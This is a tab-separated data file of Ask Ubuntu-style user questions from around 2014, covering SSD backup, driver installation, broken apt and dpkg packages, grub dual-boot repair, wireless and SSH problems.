426656	backup ssd as image	i want to backup an existing ssd on a new notebook with a pre-installed windows , recovery partition , ... before i wipe it and install ubuntu on it . ( it is too small for a dual-boot ) until now i have been using dd for that kind of situation . but now i have read on various sites that dd is n't a good choice for ssds . these are the things i came across : dd also fills empty areas with 0s reducing spare area . this makes sense to me dd may mess with alignment . i tried reading up on alignment but i still did n't get it entirely . if i do a bitwise copy of a ssd and later put it back on the same drive should n't this make them totally identical including any alignment ? dd puts unnecessary wear on a ssd . i understand that it would be better to only write areas with actual data , but is this really such an issue on a modern ssd ? my questions now are : do the things stated above make sense ? ( this is just for personal interest , my main questions follow ) is dd therefore a safe choice for backup/restore of a whole ssd drive ? if not , is clonezilla better suited ? otherwise : what is the best way to go ?
426659	how to i install a 64-bit os on my ubuntu 64-bit with vm ?	i have a copy of 64-bit 13.10 ubuntu running on my x201 . when i open virtual box and click new , it does n't show a 64-bit option for windows 7 . running latest virtual box from virtualbox.org . how can i fix this ? thinkpad x201 laptop intel vpro i5 core
426660	change newline character in gedit	so basically there is 3 types of newline characters according to operating system : windows , mac and linux . gedit is using linux by default , but i 'd like it to use windows , so i can open the same text file in windows and not get the whole text on just one line . is there any way to configure gedit to use windows newline character ? thank you !
426664	how do i reinstall python on my ubuntu 12.04 server using apt-get ?	because i totally screwed up my python installation i manually deleted all the python files and am now trying to reinstall it . when i type apt-get install -- reinstall python2.7 , i get this error message : 0 to upgrade , 0 to newly install , 1 reinstalled , 0 to remove and 0 not to upgrade . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python-minimal ( 2.7.3-0ubuntu2.2 ) ... /var/lib/dpkg/info/python-minimal.postinst : 4 : /var/lib/dpkg/info/python-minimal.postinst : python2.7 : not found dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up python2.7 ( 2.7.3-0ubuntu3.4 ) ... /var/lib/dpkg/info/python2.7.postinst : 6 : /var/lib/dpkg/info/python2.7.postinst : python2.7 : not found dpkg : error processing python2.7 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of python : python depends on python2.7 ( > = 2.7.3 ) ; however : package python2.7 is not configured yet . python depends on python-minimal ( = 2.7.3-0ubuntu2.2 ) ; however : package python-minimal is not configured yet . dpkg : error processing python ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : python-minimal python2.7 python e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i recover from this ? edit : further to kubahaha 's suggestion , i tried # dpkg -p python2.7 and it did n't work because of dependencies . this did remove the packages : # dpkg -p libapache2-mod-wsgi libpython2.7 python2.7 but then when i tried : # apt-get install python2.7 libapache2-mod-wsgi libpython2.7 i got this error message : /var/lib/dpkg/info/python-minimal.postinst : 4 : /var/lib/dpkg/info/python-minimal.postinst : python2.7 : not found dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : python-minimal e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg/apt seem to me to be very fragile in that once the system is in a bad state , they do n't seem to ever be able to put themselves back into a good state .
426668	how to install nvidia drivers for geforce 750m ? ( no bumblebee )	ubuntu 13.10 , 64bit , asus n550jv , nvidia geforce 750m i wonder has anyone succeeded to install nvidia drivers in ubuntu 13.10 64bit without bumblebee . and if yes - then what 's the trick and exact steps to follow ? my steps are the following and it always leads to black screen with only cursor visible : ubuntu 13.10 fresh install and updates ; download the latest nvidia driver for 750m ( which at present moment is 331.49 ) ; go to terminal ctrl+alt+f1 ; stop the lightdm service and execute the nvidia .run installer file ; reboot as a result i am always getting black screen after login .. only my cursor is visible and no idea what to do next ! yes , i know how to install bumblebee and run with optirun , however i do not want to do that anymore and looking for pure nvidia solution without any third parties in the middle . driver info says that it is for 750m then why isnt it running ? please help , really desperate ! thank you !
426670	vmware tools `` unable to start services ''	i am unable to get vmware tools to work in xubuntu guest , on vmware workstation 10 on windows 8.1 host . i keep getting this message below : disabling timer-based audio scheduling in pulseaudio . detected x server version 1.14.5 distribution provided drivers for xorg x server are used . skipping x configuration because x drivers are not included . creating a new initrd boot image for the kernel . update-initramfs : generating /boot/initrd.img-3.11.0-17-generic initctl : unknown job : vmware-tools-thinprint unable to start services for vmware tools execution aborted . found vmware tools cdrom mounted at /media/bogo-sort/vmware tools . ejecting device /dev/sr1 ... i thought i could do without it , however the audio `` skips '' and none of the shared folders are available .
426671	where do i get php-cgi binaries for ubuntu ?	i want to set up an nginx or apache server which is php-capable . in order to use multiple php versions in parallel i need to use cgi . i can set up the cgi stuff , but where do i get php binaries from ? i do n't want to compile them myself using some tool like phpfarm , in order to save time and to have a smaller potential to create security holes . so my question is : is there some trustworthy place out there where i can get precompiled php-cgi binaries for ubuntu 12.04.3 ? ideally as a ppa ?
426672	get the kernel version from lts package ?	how do i determine the kernel version that a package like linux-image-generic-lts-saucy will install ? basically i 'd like to get what uname -r would report before i actually install this kernel so i can automate the configuration of grub .
426679	magick rotation stops working in lenovo x230-t tablet	my lenovo x230 tablet does n't really work to take notes any more : ( i had installed magick rotation and it worked great . maybe an update of some other package makes the pen go crazy when it 's near the screen ? the screen still rotates . how do i fix this ? re-installing some packages upon which magick rotation depends ? thanks for your help ! pdp
426688	restore windows	i wanted to remove ubuntu and get back to windows . i had both windows and ubuntu running on my system . to remove ubuntu i just deleted the partition and unmounted the live cd and now i am getting this error saying `` error : no such partition. `` what should i do to get my windows 7 back ! ! ? ! ? !
426694	execute script in sh mode instead of bash in shell	i added my script called mylovelyscript.sh to /bin/ folder . my script contains code that echos text with different text colors . but when i run my script like $ mylovelyscript it executes in bash mode . so , my script give an output with the texts with color codes , like \e [ 93mhello world ! but not colored texts . but when i run my script like $ sh mylovelyscript.sh with sh command , it executes like how i want . now , i want my script to give me colored texts like in sh mode , but in this case i want to call my script like $ mylovelyscript , not like $ sh mylovelyscript . how can i do it ? thanks !
426699	can not open application in quickly	i 'm creating web browser in quickly . when i am running my application ( quickly run ) i have errors about gtk . without the webkit code it can run . sorry about my english . errors : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion 'g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type 'pygtkgenericcellrenderer ' is smaller than the parent type 's 'gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion 'node ! = null ' failed from gtk import _gtk application code : http : //pastebin.com/zrtzggxd
426701	apt-get stopped working	when trying to install anything : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : colord : depends : libsane ( > = 1.0.11-3 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried running apt-get -f install and apt-get install libsane with no luck .
426704	why does n't the xbacklight command work in rc.local ?	when i execute the command xbacklight -set 10 in my terminal the brightness is set to 0.1 as it should . but when i use this command in my rc.local-file , then it is not executed upon start -- because the brightness is not changed . why is that ?
426707	installing pyusb on ubuntu 13.10	i tried this link , but got the following message on shell : sudo apt-get install python-pip : vineet @ vineet : ~ $ sudo pip install -- upgrade pyusb downloading/unpacking pyusb could not find a version that satisfies the requirement pyusb ( from versions : 1.0.0a2 , 1.0.0a2 , 1.0.0a3 , 1.0.0a3 , 1.0.0b1 ) cleaning up ... no distributions matching the version for pyusb storing complete log in /home/vineet/.pip/pip.log i want to use pyusb 1.0 ( or above , if it exists ( i am a newbie ) ) which is written in python . also will i need libusb to run pyusb ? please tell me how to download that too ! i have tried an failed in both cases.i am using ubuntu 13.10 so please respond accordingly .
426710	rename app stops running from toolbar	after installing some apps , i wanted them to open via the terminal . unfortunately ubuntu uses names for these new apps that are hard to remember . i renamed my file by : mv ¨old file directory/old filename¨ ¨new file directory/new filename¨ whereas i changed the filename , not the directory . with the new filenames i can remember the `` shortcuts '' for the terminal . but when i want to lock these apps to the toolbar , i ca n't open these apps from the toolbar . when i click the icon , it 's flashing yellow , and nothing happens . what am i doing wrong ?
426713	while loop in shell	i want to make a while ... loop statement in my shell script like : while [ $ line < $ line_number ] ; do echo $ line done but there is an error . i think it is because i wrote it in bash code . but i need to do it in sh mode . how can i do it ? thanks !
426714	computer continously boots after kernel version 3.13.5 installed on ubuntu 13.10	there is some strange thing that happened after i installed kernel 3.13.5 on ubuntu 13.10 . after restart i selected new installed kernel in grub . after that ubuntu starts up like usually and i can see the desktop of ubuntu . but after some seconds ( 4 or 5 ) the computer restarts again by itself . and then it is always starting up until i see desktop and it restarts again , ... . , ... . , ... . . only chance i have is to open grub during startup and to select my previous used kernel version 3.11.x . does anybody have an idea what can be a reason for this ? thanks in advance !
426718	macchanger address change wo n't stay	i ran : sudo macchanger -r wlan0 sudo macchanger -m xx : xx : xx : xx : xx : xx wlan0 both of these commands produce a change as confirmed with both ifconfig wlan0 and macchanger -s wlan0 . but after i connect to a router -- or after a few minutes -- the mac address always reverts back to default . anybody know how to get macchanger working ?
426720	which drive is better to keep a swap ?	i have a laptop with a processor core i5 . 4 gb of ram . the laptop has a built-in hard disk sandisk ssd u100 24gb [ 10.52.01 ] ( /dev/sda ) . read speed 270 mb / s , write speed of 78 mb / s. in addition , i set another disc corsair force 3 ssd ( 5.02 ) ( /dev/sdb ) . read speed 217 mb / s , write speed of 216 mb / s. question : if the system is on disk /dev/sdb5 . which drive is better to keep a swap ?
426722	dual boot not available after upgrading to windows 8.1	as per title , i can not boot to ubuntu 12.04 after upgrading from w8 to w 8.1 . i have read several topics on this forum , but i do n't seem to be able to solve the problem . i have tried first with boot-repair , but it did n't work . i have also tried with the guide at how can i repair grub ? ( how to get ubuntu back after installing windows ? ) but it did not work either , although i got no error messages ( i also tried step no . 7 ) . i am not sure if i am not identifying the right partition or have some other problem . this is getting annoying and time-wasting . i am quite a noob with linux , but i do need it for work . if i type : ls -l /dev/disk/by-label/ this is what i get : lrwxrwxrwx 1 root root 10 feb 26 19:03 recovery - > ../../sda5 lrwxrwxrwx 1 root root 10 feb 26 19:03 system - > ../../sda1 lrwxrwxrwx 1 root root 10 feb 26 19:03 ti10664600j - > ../../sda4 lrwxrwxrwx 1 root root 9 feb 26 19:03 ubuntu\x2012.04.3\x20lts\x20amd64 - > ../../sr0 ( ti10664600j is the windows partition ) i think i need some help ... edit : typing : sudo parted -l i get : number start end size file system name flags 1 1049kb 1075mb 1074mb ntfs basic data partition hidden , diag 2 1075mb 1347mb 273mb fat32 basic data partition boot 3 1347mb 1482mb 134mb ntfs basic data partition msftres 4 1482mb 246gb 244gb ntfs basic data partition 6 246gb 301gb 55.0gb ext4 7 301gb 475gb 174gb ext4 8 475gb 489gb 14.0gb linux-swap ( v1 ) 5 489gb 500gb 11.4gb ntfs basic data partition hidden , diag i am not sure now which partition i should mount to then install the grub . as an alternative , should i try to install it on all of them ? ok , second edit : after starting windows , i can shift-click on restart . doing so prompts me to a menu when i can choose to boot from a device -- > i can choose to boot ubuntu . the computer restarts and the grub kicks in , with the normal dual boot menu . so , it looks like the grub is still there , it is just not starting when i turn the computer on .
426723	can not enable wireless adapter ( new to ubuntu )	i am unable to enable my wireless interface . i tried the command `` sudo ifconfig eth0 up '' but it is still disabled . it is a pro/wireless 3945abg [ golan ] i just started using ubuntu on my other laptop to be a replacement for windows xp , but need to have wireless capability . is this a driver issue ? i downloaded ubuntu via wireless from windows , but since installing have no internet access in ubuntu . i am a complete linux noob , so i have no idea what i need to do . when i try to turn on wireless using the network button , it said not available . switching the wireless on my laptop toggles airplane mode , but nothing more . do i need to create a vpn client ? i do n't know how to do this , but it was brought up when i clicked the + button below the wired/wireless options under network . any help you could provide would be greatly appreciated .
426725	log in with a password	i have not enabled auto login , but i can still log in to my account without entering my password . i want to turn this option off and let ubuntu ask me for my password before logging in . this is only the case with one account . i believe it 's the root account that has this no password option enabled i am using ubuntu 13.10 . thanks in advance !
426730	wireless stops working after a while , ubuntu 12.04	i 've recently switched to a dual-boot windows 7 - ubuntu and i 'm loving some of ubuntu 's features , not to mention how awesome it is for development . but i degress . i 'm using a dell vostro 5470 laptop , with an intel wi-fi b/g/n . after a few minutes of use , the wi-fi completely stops responding and even my local router is unreachable . i 've tried to find a pattern in the way it hangs but with no success . i 've been keeping a terminal with a 5-10 seconds ping to google.com ( or 8.8.8.8 , whatever ) and while it does work great for a while , with < 30ms responses , at a certain point it 's returning `` destination unreachable '' . disabling wireless and enabling it makes it work again but after a while , the same behavior is present . i 'm 100 % sure it is not a router problem , nor a hardware problem as the windows 7 installation works flawlessly in this regard . how would i go about debugging and finding the culprit ? thanks , much appreciated !
426734	can not update because of webfilter set in the router	we use iboss web-filter . when ever i try to install a program or update the system it fails . i believe the problem is our web-filter i have tried to list it in the allow websites ( sites that are safe ) i should be able to list by ubuntu.com and everything on the ubuntu site would be considered safe . i also tried security.ubuntu.com with no better results . any help would be greatly appreciated .
426735	making a custom mouse cursor in ubuntu 12.04	i have done some customization to my desktop but i am really stumped on trying to figure out how to make my own mouse cursor by taking a png and editing it and then making it an x11 file . i have gotten all the files i need and made them all , in fact the cursor ( its a star trek logo ) shows up in the gnome tools advanced setting as star-trek-cursor , but when i go into the command line to use sudo update-alternatives -- config x-cursor-theme , it does not show up in the list anywhere to set it . i have tried making a .theme file where all the other x11 cursors are located , but no luck so i figured i would see if anyone else out there has had luck with this .
426736	how to prevent a kiosk running ubuntu 13.10 showing the update dialog popup window ?	in my kiosk i have ubuntu 13.10 . how to remove/suspend/blacklist/hide/disable completely from the ubuntu 13.10 this following popup via command line ? ( even with gui when i click settings and insert my password it still fails and keep repeating it ) this setup is running in a busy railway , where passengers passing very busy place every day almost every hour i have this strange popup `` software update '' even i do not want it please kindly anyone suggest how to remove this to stop disturbing ? i have tried following but none works : root @ touch : ~ # vim /etc/default/grub add grub_recordfail_timeout=0 root @ touch : ~ # vim /etc/default/apport put 0 root @ touch : ~ # sudo sed -i 's/nodisplay=true/nodisplay=false/g ' /etc/xdg/autostart/*.desktop root @ touch : ~ #
426738	bumblebee on 13.10 ; can not access secondary gpu	im dual booting linux and windows on my sony f1521ksnb ( 1.8ghz intel core 3rd gen i5 processor , 4gb ram , nvidia geforce gt 740m ) . i realized ubuntu wasnt using my nvidia chip and googled to find out more . then i came across bumblebee . i did a fresh installation of ubuntu 13.10 and then followed this https : //wiki.ubuntu.com/bumblebee to install it . after rebooting i get this error after i type optirun firefox [ 1040.265565 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 1040.265688 ] [ error ] aborting because fallback start is disabled . i then googled a lot followed a lot of answers in askubuntu and other sites but to no avail . any working solution is appreacted . steps i took includes this and others.nothing seems to work . sudo gedit /etc/bumblebee/bumblebee.conf on the bottom of the first section you find driver= change it to driver=nvidia further down : # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current -- -- -- > change to kerneldriver=nvidia module=nvidia pmmethod=auto
426745	ascii control characters ubuntu 12.04lts	i have a python 2.7 program that accepts iuid 2d bar codes from a hand scanner . i developed this on windows xp using pyqt and both the scanner that send ascii control characters and the one that does n't works . under ubuntu 12.04 lts the scanner that does not send control characters works the one that does does not . by control characters i mean characters coded below ascii 32 . it appears that ascii 29 kills the input . appears to pass through . being very new to linux i am not at all sure where to start . i did try double checking against gvim and gedit and both of those also do not get past the character . is there anything i can do to get the system to pass all characters below 255 ? the scanners are connected via usb and act as an hid . any pointers would be most appreciated . note : on windows i have to use the qstring.toascii ( ) function because of a unicode character at the end of the string that was crashing the program . thanks
426748	upgrading install from 13.04 to 13.10	i downloaded the 13:10 i386 32bit version it is in my folder as a .iso how do install this version ? i am new to linux but i try extract it and it gives me an error . so what am i doing wrong ?
426750	how can i update my nodejs to the latest version ?	i have installed nodejs on ubuntu with following code sudo apt-get install nodejs since i am a new user for ubuntu i also ran this code too sudo apt-get install npm now when i type nodejs -- version it shows v0.6.19 i checked and saw latest nodejs version is 0.10.26 how can i update my version of nodejs to 0.10.26 ? i tried with sudo apt-get install < packagename > sudo apt-get install -- only-upgrade < packagename > but no luck .
426751	picasa wo n't stick in unity launcher	i just installed picasa 3.9 ( in wine ) in ubuntu 12.04lts with unity . it works fine . i can launch it via the dash ok . i can slide the picasa icon from the dash to the launcher & it stays there during that session & launches picasa ok . but if i logout-login ( or reboot ) then the picasa icon is no longer in the launcher . how can i get the picasa icon to stay in the launcher like all native applications ? i have absolutely no problem finding my picasa launching icon in the dash . my problem is ( was ) that if i slide that icon to the unity launcher bar ( as with any other application ) then it works ok but only until the next login , when it is no longer in the unity launcher bar . i wanted to know if that was normal behaviour or not . i also wanted to know if it could be fixed so the picasa icon stayed in the launcher bar permanently . if the supposedly duplicate question answers that , then it is too complicated for me to understand . i need simple gui instructions ! anyway - in the meantime , by blindly fumbling , i have found an answer which satisfies me for the moment . i dragged the picasa icon from the dash to a new folder . then right-clicked to create a link . right-clicked the link > properties > allow executing as program . dragged the link to the unity launcher bar . it survives there through logout-login & rebooting . i confirmed the method in another user 's session .
426754	how do i download flash player to see youtube videos ?	i clicked `` atp for ubuntu 10.04+ '' and when i click download it asks me to choose an application . i did some searching , and atp is not listed in my firefox applications listing . should i have clicked on of the other linux ( but not ubuntu ) options ?
426755	ubuntuone : synchronism failure	i have 2 pcs with ubuntu 12.04 and i have had problems with syncronization of the files . when i modify a file or when i try to connect it my ubuntuone do n't make the synchronism and show me the message : ( auth failed ( auth_failed ) ) . how do i do to fix it ? thanks , vină­cius .
426757	where are launchable programs installed ?	i 'm brand new to ubuntu and not familiar with command line ... yet . i 'm hungry to learn . i am already familiar with apt-get and understand that software installed through apt-get is installed correctly , but i have no idea where the files are going . where is the launchable program located ?
426758	can not access ubuntu server 13.10 remotely after server reboot	i 've encountered a weird problem imo , and none of my co-workers have no idea why this keeps happening . first of , i 've built a little server machine for beta testing of my upcoming software & website . i installed ubuntu server 13.10 on the machine and openssh-server on it . the machine has only ethernet cable plugged in , no monitors or keyboards . my router uses a dhcp server but i have setuped a static ip for server . i can remotely access it from public easily . i forwarded ssh port from my router . i did some changes to my website files and then i decided for some odd reason to reboot the server . after rebooting it , i can not access it from public anymore . the server is currently at home and i 'm away . but i managed to get physically to the server today . i plugged in a monitor to inspect in which state the server is . the server was on logon state . i checked is router working fine by connecting into wlan with my phone , and went to whatsmyipaddress.com . ip had n't changed and connection was working . i did n't have keyboard nor my laptop with me to inspect it further . i assumed it was working because it had rebooted and internet connection was fine . when i finally made it to my laptop and tried to connect with putty it said `` network error : connection refused '' . my lucky guess is that after every reboot i need to login physically on the server before ssh connections will work . i googled and found about of autologin . would n't that then be a security issue ? i mean you could just make a ssh connection from every single machine with internet connection if you just happen to know the ip address , and then you could just mess everything up , am i right ? i need some suggestions what to do for this . i get to the server machine again tomorrow morning with laptop and keyboard this time so i can inspect it further . i hope you guys make up some suggestions what i should do about it . i must be able to reboot the server remotely , and then get back on it after reboot . the best regards , roope
426761	prepaid manager problem : ussd_initiate failed : timeout was reached	prepaid manager could not check the balance due to modem initialization failure and timeout reach . first time i get '' modem error : ussd_initiate failed : timeout was reached '' , next i get '' modem error : ussd_initiate failed : gdbus.error : org.freedesktop.modemmanager.modem.general : ussd session already active. '' . is there any way to check balance without using windows ? i use d-link dwm-156 usb modem . aircel pre-paid connection . adjusted the /usr/share/mobile-broadband-provider-info/serviceproviders.xml as : < apn value= '' aircelgprs.pr '' > < plan type= '' prepaid '' / > < usage type= '' internet '' / > < name > gprs ( prepaid ) < /name > < voicemail > 120 < /voicemail > < balance-check > < ussd > *122*011 # < /ussd > < /balance-check > < balance-top-up > < ussd replacement= '' code '' > *130*code # < /ussd > < /balance-top-up > < /apn > < apn value= '' aircelumts.pr '' > < plan type= '' prepaid '' / > < usage type= '' internet '' / > < name > gprs ( prepaid ) < /name > < voicemail > 120 < /voicemail > < balance-check > < ussd > *122*011 # < /ussd > < /balance-check > < balance-top-up > < ussd replacement= '' code '' > *130*code # < /ussd > < /balance-top-up > < /apn > < apn value= '' aircelweb.pr '' > < plan type= '' prepaid '' / > < usage type= '' internet '' / > < name > gprs ( prepaid ) < /name > < voicemail > 120 < /voicemail > < balance-check > < ussd > *122*011 # < /ussd > < /balance-check > < balance-top-up > < ussd replacement= '' code '' > *130*code # < /ussd > < /balance-top-up > < /apn >
426763	league of legends on ubuntu 12.04 lts	i 'm just new in ubuntu and my english is so bad , so be patient to me . i was install league of legends with playonlinux , installation was without errors , but , when i want to run it , a logo is appeard and it 's gradually be more dark , like a suspended process . what can i do with it ?
426770	ubuntu 13.10 livecd - ms surface support	i have been working on a custom ubuntu livecd based on 13.10 x64 for the ms surface pro tablet i have been given at work . the goal is not to install ubuntu on the device , but rather work in a livecd environment . i have been using uck to customize the default iso , and i am nearly complete with the requirements , save one really annoying issue . when the surface pro boots to the usb drive , i am presented with the grub menu for my list of choices . the surface pro keyboard works just fine , allowing me to choose up/down options . once i press the 'enter ' key , and the gui launches , the surface pro keyboard no longer works . i am forced to use the program 'onboard ' to have a on-screen keyboard to do what i need . oddly enough , this started happening once the following ms update was pushed to the tablet for windows 8.1 support . kb2871690 once this is applied to the surface pro , the keyboard issue comes alive . does anyone have a solution , driver package , setting change that will get my surface pro keyboard working again in the ubuntu 13.10 x64 livecd ?
426772	ubunto 13.10 installation issues on a lenovo w510	i installed ubuntu 13.10 x64 on my lenovo thinkpad w510 laptop via a live usb key . during installation , my hardware works . after installing and rebooting , various hardware no longer works ( ie . touchpad , network card , wireless card , usb ports , etc. ) . graphics work , but they are in low resolution , as if video drivers are not installed . any assistance is greatly appreciated . eric
426774	ubuntu 13.10 showing busybox ?	can any one plzzz tell me how to get rid of this busybox in ubuntu 13.10 ? ? : / linux was working fine , but 2 days ago my laptop was out of battery and it shutdown . when i restart it , ubuntu was showing this busybox need help plzzz ! ! !
426778	system crashes with large file transfers	running ubuntu 12.04 on a g5 ppc with sonnet tempo sata controllers on sii 3112 chipset , sata_sil driver info reads from drives fine , but when i try to write to the drive ( more than 2gb ) the system freezes up and requires reboot ram is fine , disks work when attached to the onboard k2 bus . any thoughts ?
426784	why ca n't i boot into windows boot manager from grub ?	i just recently , recently being last night , installed ubuntu 13.10 on my laptop for school . i really want to learn about ubuntu and how to use it . the main problem i am having is trying to start into windows from grub . whenever i restart my laptop , i am taken to grub and try to select the windows boot manager , but it gives me and error and goes back to the grub menu . i tried using boot-repair , but that just made more options pop-up in grub . does anyone know what is happening , and how i can fix this problem ?
426787	stuck in low graphics mode	i have an asus eee pc 900 . i had just gotten it from ebay two days ago . since then it has been working fine except that the graphics were a little buggy and slow . a message appeared on the screen today saying : the system is running in low-graphics mode your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . i could n't get to my regular desktop , and i am stuck in low graphics mode . a forum post told me to install the nvidia driver and gave me a code to install it . i do n't know how to do that , and i am not sure what version of linux i have . how can i fix this problem ?
426791	suspend not working correctly on macbook pro 5,5	i 've tried some answers from other questions similar , but no success . i have a macbook pro 5,5 with ubuntu 13.10 freshly installed from dvd . almost everything works straight out of the box but one issue , which is quite annoying , is that suspend does n't work . the issue : close the lid and system suspends - great this is what i want . open lid and try and resume system , get beyond a black screen almost to the log-in screen . i get to a screen showing the same background as i would have on a log-in screen , but nothing more than background . no log-in options at all . it then stays like this . i then have to force the system to shutdown and start from scratch . any suggestions - do you need more info ? i 'm new to ubuntu but want it to work - rather than have to go and buy mac os to run on this system . thanks
426792	broken apt-get issue even with apt-get install -f	here 's the problem . i tried to install a .deb for an epson scanner ( http : //download.ebz.epson.net/dsc/search/01/search/searchmodule ) and did accidentally installed the i386 instead of the amd64 version . now i get the following issue . the same issue crops up if i try to uninstall or purge using dpkg too ! sudo apt-get autoremove [ sudo ] password for *** : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : iscan-plugin-gt-x770 : depends : iscan ( > = 2.16.1 ) but it is not installable iscan-plugin-gt-x820 : depends : iscan ( > = 2.22.0 ) but it is not installable e : unmet dependencies . try using -f. â ~ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : ... libreoffice-java-common ... linux-image-extra-3.11.0-13-generic linux-image-extra-3.11.0-14-generic linux-image-extra-3.11.0-15-generic lp-solve openjdk-7-jre-lib swig swig2.0 use 'apt-get autoremove ' to remove them . the following packages will be removed : iscan-plugin-gt-x770 iscan-plugin-gt-x820 0 upgraded , 0 newly installed , 2 to remove and 3 not upgraded . after this operation , 926 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 693386 files and directories currently installed . ) removing iscan-plugin-gt-x770 ... /var/lib/dpkg/info/iscan-plugin-gt-x770.prerm : 4 : /var/lib/dpkg/info/iscan-plugin-gt-x770.prerm : iscan-registry : not found dpkg : error processing iscan-plugin-gt-x770 ( -- remove ) : subprocess installed pre-removal script returned error exit status 127 no apport report written because maxreports is reached already /var/lib/dpkg/info/iscan-plugin-gt-x770.postinst : 4 : /var/lib/dpkg/info/iscan-plugin-gt-x770.postinst : iscan- registry : not found removing iscan-plugin-gt-x820 ... /var/lib/dpkg/info/iscan-plugin-gt-x820.prerm : 4 : /var/lib/dpkg/info/iscan-plugin- gt-x820.prerm : iscan-registry : not found dpkg : error processing iscan-plugin-gt-x820 ( -- remove ) : subprocess installed pre-removal script returned error exit status 127 no apport report written because maxreports is reached already /var/lib/dpkg/info/iscan-plugin-gt-x820.postinst : 4 : /var/lib/dpkg/info/iscan-plugin-gt-x820.postinst : iscan- registry : not found errors were encountered while processing : iscan-plugin-gt-x770 iscan-plugin-gt-x820 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
426793	ubuntu 13.10 dell e1705 wired and wireless broken	when installing from a live usb , the wired connection worked . upon reboot the wired and wireless do not work now . lspci shows them as : wired bcm4401-b0 wirelss bcm4311 r2 how can i fix this ? `` edit '' sudo modprobe b44 and the terminal cursor sits there solid . i dont see the typical command line response . edit : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . ~ $ sudo dpkg -- configure -a setting up bcmwl-kernel-source ( 6.30.223.141+bdcom-0ubuntu1 ) ... removing old bcmwl-6.30.223.141+bdcom dkms files ... -- -- -- -- uninstall beginning -- -- -- -- module : bcmwl version : 6.30.223.141+bdcom kernel : 3.11.0-12-generic ( i686 ) status : before uninstall , this module version was active on this kernel . wl.ko : - uninstallation - deleting from : /lib/modules/3.11.0-12-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... ... dkms : uninstall completed . deleting module version : 6.30.223.141+bdcom completely from the dkms tree . done . loading new bcmwl-6.30.223.141+bdcom dkms files ... building only for 3.11.0-12-generic building for architecture i686 building initial module for 3.11.0-12-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.11.0-12-generic/updates/dkms/ depmod ... . dkms : install completed . do i restart the laptop ? thanks !
426794	upstart : run job after networking has finished starting	i 'm trying to start an upstart job after making sure networking interfaces are up . this is what i have now : start on started network-interface interface=eth0 stop on runlevel [ ! 2345 ] pre-start script test -x /usr/sbin/dibbler-client || { stop ; exit 0 ; } test -c /dev/null || { stop ; exit 0 ; } end script exec /usr/sbin/dibbler-client start 2 > & 1 > /dev/null the problem is that dibbler is obviously started too soon since i 'm getting client critical interface eth0/2 is down or does n't have any link-local address . is there a simple way of solving this with events or i 'd have to do it in the pre-start ? i 'm using only /etc/networking/interfaces and the networking script for configuration . so no network manager .
426796	why does `` scanning disks '' always take 3 -4 hours ?	is there something wrong with my hard drive ? i have tons of small files on my c drive in windows . i shrunk that partition to make enough room for a new partition . it 's taken me days just to get this far . in gparted , the same thing , 3 - 4 hours just to get it to go from `` searching disks '' or whatever it is , to the next screen where it actually lets me do something . before i shrunk my partition , i had to defrag the hard drive and now my windows 7 runs great , but i still wanted to install ubuntu 13.10 on the 50 gb or so i created for linux . i finally got to the point where i could put my installation live cd in and thought after one wait while `` scanning disks '' scanned my disks , i could install and be done with it - but i got an error `` no root file defined '' or something like that , so back to google i went to find out i had to type in / somewhere only to have the installation once again go back to `` scanning disks '' . now come to find out it 's recommended that i create a swap partition too , so i imagine i still have 2 or 3 more 3 - 4 hour wait periods to look forward to and if i make a mistake , it 's even more . in view of the fact that my windows 7 installation runs great now , is there something wrong with my hard disk or is it the tons of small files on my c drive or is it something else that is causing all these excruciatingly long wait periods ?
426805	building a smtp-server on ubuntu server	i was wondering if it is possible to build your own smtp-server and if it is , then i would like to know how . i have 2 older pcs which i can use to do it . i wan na give this a go since i have a mail-account where i can receive mails but ca n't send them unless its done directly online . it would be nice if someone could tell me what i need and where i can learn it . i prefer using ubuntu server so thats why i came here .
426808	network problems in ubuntu 12.04	i have a computer i have n't used in a while running ubuntu 12.04 i want to upgrade to fix the problems but i ca n't get a working connection . during start up i get the message waiting for network configuration.once started i used to be able to get online by running sudo dhclient eth0 to make my wired connection work . i 've tested the wired connection works on another machine . i 've tried a load of things from googling to no avail . please help . i 'm pretty much a novice ubuntu user . if there 's any logs i need to include here let me know .
426809	how to list the size of a directoy and subdirectories and files inside it by terminal ?	is there a command to list a directory total size and then each sub-folder and files inside it . its good to sort them by increasing order also so i can know which is the grater folder size . any help .
